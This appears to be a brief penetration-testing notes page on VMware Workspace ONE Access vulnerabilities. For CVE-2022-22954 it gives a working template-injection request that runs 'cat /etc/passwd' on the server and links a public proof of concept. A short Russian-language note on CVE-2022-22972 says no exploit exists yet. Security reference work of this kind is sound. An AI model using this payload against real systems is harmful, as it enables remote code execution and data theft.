Workspace ONE Access
CVE-2022-22954: SSTI
/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
PoC: https://github.com/sherlocksecurity/VMware-CVE-2022-22954
CVE-2022-22972: Auth Bypass
На Linux серверах. Вероятно связан с VMWare Horizon. Эксплоита нет, патч вышел, скачать не могу: https://kb.vmware.com/s/article/88438
Last updated
Was this helpful?